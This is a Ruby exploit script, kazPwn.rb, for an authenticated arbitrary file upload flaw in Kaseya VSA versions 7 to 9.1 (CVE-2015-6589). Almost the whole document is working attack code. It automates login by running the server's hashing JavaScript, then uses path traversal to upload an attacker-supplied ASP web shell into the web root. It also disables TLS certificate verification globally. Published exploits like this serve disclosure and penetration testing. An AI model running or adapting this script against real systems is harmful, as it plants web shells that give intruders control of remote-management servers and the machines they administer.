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kazPwn.rb
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#!/usr/bin/ruby
#
# kazPwn.rb - Kaseya VSA v7 to v9.1 authenticated arbitrary file upload (CVE-2015-6589 / ZDI-15-450)
# ===================
# by Pedro Ribeiro <[email protected]> / Agile Information Security
# Disclosure date: 28/09/2015
#
# Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>
#
# execjs and mechanize gems are required to run this exploit
#
# According to Kaseya's advisory, this exploit should work for the following VSA versions:
# VSA Version 7.0.0.0 – 7.0.0.32
# VSA Version 8.0.0.0 – 8.0.0.22
# VSA Version 9.0.0.0 – 9.0.0.18
# VSA Version 9.1.0.0 – 9.1.0.8
# This exploit has been tested with v8 and v9.
#
# Check out these two companion vulnerabilities, both of which have Metasploit modules:
# - Unauthenticated remote code execution (CVE-2015-6922 / ZDI-15-449)
# - Unauthenticated remote privilege escalation (CVE-2015-6922 / ZDI-15-448)
#
# This code is released under the GNU General Public License v3
# http://www.gnu.org/licenses/gpl-3.0.html
#
require 'execjs'
require 'mechanize'
require 'open-uri'
require 'uri'
require 'openssl'
# avoid certificate errors
OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil
# Fixes a Mechanize bug, see
# http://scottwb.com/blog/2013/11/09/defeating-the-infamous-mechanize-too-many-connection-resets-bug/
class Mechanize::HTTP::Agent
MAX_RESET_RETRIES = 10
# We need to replace the core Mechanize HTTP method:
#
# Mechanize::HTTP::Agent#fetch
#
# with a wrapper that handles the infamous "too many connection resets"
# Mechanize bug that is described here:
#
# https://github.com/sparklemotion/mechanize/issues/123
#
# The wrapper shuts down the persistent HTTP connection when it fails with
# this error, and simply tries again. In practice, this only ever needs to
# be retried once, but I am going to let it retry a few times
# (MAX_RESET_RETRIES), just in case.
#
def fetch_with_retry(
uri,
method = :get,
headers = {},
params = [],
referer = current_page,
redirects = 0
)
action = "#{method.to_s.upcase} #{uri.to_s}"
retry_count = 0
begin
fetch_without_retry(uri, method, headers, params, referer, redirects)
rescue Net::HTTP::Persistent::Error => e
# Pass on any other type of error.
raise unless e.message =~ /too many connection resets/
# Pass on the error if we've tried too many times.
if retry_count >= MAX_RESET_RETRIES
puts "**** WARN: Mechanize retried connection reset #{MAX_RESET_RETRIES} times and never succeeded: #{action}"
raise
end
# Otherwise, shutdown the persistent HTTP connection and try again.
# puts "**** WARN: Mechanize retrying connection reset error: #{action}"
retry_count += 1
self.http.shutdown
retry
end
end
# Alias so #fetch actually uses our new #fetch_with_retry to wrap the
# old one aliased as #fetch_without_retry.
alias_method :fetch_without_retry, :fetch
alias_method :fetch, :fetch_with_retry
end
if ARGV.length < 4
puts 'Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>'
exit -1
end
host = ARGV[0]
username = ARGV[1]
password = ARGV[2]
shell_file = ARGV[3]
login_url = host + '/vsapres/web20/core/login.aspx'
agent = Mechanize.new
# 1- go to the login URL, get a session cookie and the challenge.
page = agent.get(login_url)
login_form = page.forms.first
challenge = login_form['loginFormControl$ChallengeValueField']
# 2- calculate the password hashes with the challenge
source = open(host + "/inc/sha256.js").read
source += open(host + "/inc/coverPass.js").read
source += open(host + "/inc/coverPass256.js").read
source += open(host + "/inc/coverData.js").read
source += open(host + "/inc/passwordHashes.js").read
source.gsub!(/\<\!--(\s)*\#include.*--\>/, "") # remove any includes, this causes execjs to fail
context = ExecJS.compile(source)
hashes = context.call("getHashes",username,password,challenge)
# 3- submit the login form, authenticate our cookie and get the ReferringWebWindowId needed to upload the file
# We need the following input values to login:
# - __EVENTTARGET (empty)
# - __EVENTARGUMENT (empty)
# - __VIEWSTATE (copied from the original GET request)
# - __VIEWSTATEENCRYPTED (copied from the original GET request; typically empty)
# - __EVENTVALIDATION (copied from the original GET request)
# - loginFormControl$UsernameTextbox (username)
# - loginFormControl$PasswordTextbox (empty)
# - loginFormControl$SubmitButton (copied from the original GET request; typically "Logon")
# - loginFormControl$SHA1Field (output from getHashes)
# - loginFormControl$RawSHA1Field (output from getHashes)
# - loginFormControl$SHA256Field (output from getHashes)
# - loginFormControl$RawSHA256Field (output from getHashes)
# - loginFormControl$ChallengeValueField (copied from the original GET request)
# - loginFormControl$TimezoneOffset ("0")
# - loginFormControl$ScreenHeight (any value between 800 - 2048)
# - loginFormControl$ScreenWidth (any value between 800 - 2048)
login_form['__EVENTTARGET'] = ''
login_form['__EVENTARGUMENT'] = ''
login_form['loginFormControl$UsernameTextbox'] = username
login_form['loginFormControl$SHA1Field'] = hashes['SHA1Hash']
login_form['loginFormControl$RawSHA1Field'] = hashes['RawSHA1Hash']
login_form['loginFormControl$SHA256Field'] = hashes['SHA256Hash']
login_form['loginFormControl$RawSHA256Field'] = hashes['RawSHA256Hash']
login_form['loginFormControl$TimezoneOffset'] = 0
login_form['loginFormControl$SubmitButton'] = 'Logon'
login_form['loginFormControl$screenHeight'] = rand(800..2048)
login_form['loginFormControl$screenWidth'] = rand(800..2048)
page = agent.submit(login_form)
web_windowId = Hash[URI::decode_www_form(page.uri.query)]['ReferringWebWindowId']
# 4- upload the file using the ReferringWebWindowId
page = agent.post('/vsapres/web20/json.ashx',
'directory' => "../WebPages",
'ReferringWebWindowId' => web_windowId,
'request' => 'uploadFile',
'impinf__uploadfilelocation' => File.open(shell_file)
)
if page.code == "200"
puts "Shell uploaded, check " + host + "/" + File.basename(shell_file)
else
puts "Error occurred, shell was not uploaded correctly..."
end